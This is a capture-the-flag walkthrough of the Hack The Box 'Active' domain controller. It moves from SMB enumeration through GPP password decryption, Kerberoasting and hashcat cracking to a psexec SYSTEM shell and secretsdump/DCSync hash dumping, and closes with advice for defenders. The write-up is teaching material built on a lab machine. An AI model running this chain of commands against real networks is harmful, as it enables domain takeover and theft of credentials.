Skip to main content
🧠Educationalintermediate4 min read

HTB: Active Directory Lab (Intermediate)

An intermediate walkthrough covering Active Directory enumeration, Kerberoasting, and domain privilege escalation techniques.

Hack The BoxCTFActive DirectoryKerberosintermediate
Share:𝕏in

HTB: Active Directory Lab (Intermediate)

Active Directory environments are everywhere in corporate networks. This walkthrough covers essential AD attack techniques through a Hack The Box machine.

Box Information

  • Name: Active (example AD box)
  • OS: Windows Server
  • Difficulty: Medium
  • Skills: AD enumeration, SMB, Kerberoasting, Group Policy abuse

Initial Reconnaissance

Nmap Scan

nmap -sC -sV -p- -oA nmap/active 10.10.10.100

Results:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows AD LDAP
445/tcp   open  microsoft-ds  Windows Server 2008 R2
464/tcp   open  kpasswd5
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          AD Global Catalog
3269/tcp  open  tcpwrapped

This is clearly a Domain Controller.

SMB Enumeration

Anonymous Access

smbclient -L //10.10.10.100 -N

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
Replication     Disk      
SYSVOL          Disk      Logon server share
Users           Disk

Replication Share

The Replication share allows anonymous access:

smbclient //10.10.10.100/Replication -N

Exploring the share reveals a Groups.xml file in a GPP directory.

Group Policy Preferences (GPP) Attack

Finding GPP Passwords

get active.htb/Policies/{...}/MACHINE/Preferences/Groups/Groups.xml

Contents:

<Groups>
  <User name="active.htb\SVC_TGS" 
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" />
</Groups>

Decrypting GPP Password

Microsoft published the AES key used for GPP encryption. We can decrypt:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Output: GPPstillStandingStrong2k18

We now have credentials: SVC_TGS:GPPstillStandingStrong2k18

Domain Enumeration

Validating Credentials

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

Success! The credentials are valid.

LDAP Enumeration

ldapsearch -x -H ldap://10.10.10.100 -D "SVC_TGS@active.htb" -w 'GPPstillStandingStrong2k18' -b "DC=active,DC=htb"

Enumerate users, groups, and service accounts.

BloodHound Collection

bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -d active.htb -dc dc.active.htb -c all

Import into BloodHound to visualize attack paths.

Kerberoasting

Identifying SPNs

Service Principal Names (SPNs) indicate service accounts that can be Kerberoasted:

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100

Output:

ServicePrincipalName  Name           MemberOf
--------------------  ----           --------
active/CIFS:445       Administrator  Domain Admins

The Administrator account has an SPN!

Requesting TGS

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

This returns a Kerberos TGS ticket encrypted with the service account's password hash.

Cracking the Hash

Save the hash to a file and crack with hashcat:

hashcat -m 13100 tgs_hash.txt /usr/share/wordlists/rockyou.txt

Cracked: Ticketmaster1968

Domain Admin Access

Verifying Admin Credentials

crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'

Output shows (Pwn3d!) - we have admin!

Getting a Shell

psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

We now have a SYSTEM shell on the Domain Controller.

Post-Exploitation

Dumping Hashes

secretsdump.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

This dumps:

  • NTLM hashes
  • Kerberos keys
  • Cached credentials
  • LSA secrets

DCSync Attack

With Domain Admin privileges, we can perform DCSync:

secretsdump.py -just-dc active.htb/Administrator:Ticketmaster1968@10.10.10.100

Flags

type C:\Users\SVC_TGS\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt

Attack Chain Summary

  1. Anonymous SMB access → Found Replication share
  2. GPP password → Decrypted to get SVC_TGS credentials
  3. Kerberoasting → Obtained Administrator TGS
  4. Password cracking → Recovered Administrator password
  5. Domain Admin → Full domain compromise

Lessons Learned

For Penetration Testers

  • Always check for anonymous SMB access
  • GPP passwords are still common in older environments
  • Kerberoasting is highly effective against weak passwords
  • BloodHound is essential for AD assessments

For Defenders

  • Remove GPP passwords from SYSVOL immediately
  • Implement strong password policies for service accounts
  • Use gMSA for service accounts where possible
  • Regularly audit SPNs
  • Deploy honeytokens for detection

Tools Used

  • nmap
  • smbclient
  • gpp-decrypt
  • Impacket (GetUserSPNs, secretsdump, psexec)
  • hashcat
  • BloodHound
  • crackmapexec

Want to learn Active Directory penetration testing? Contact us: m1k3@msquarellc.net

Found this helpful? Share it:

Share:𝕏in

Need Help With This?

Have questions about implementing these security practices? Let's discuss your specific needs.

Get in Touch

More in Educational

Explore more articles in this category.

Browse 🧠 Educational

Related Articles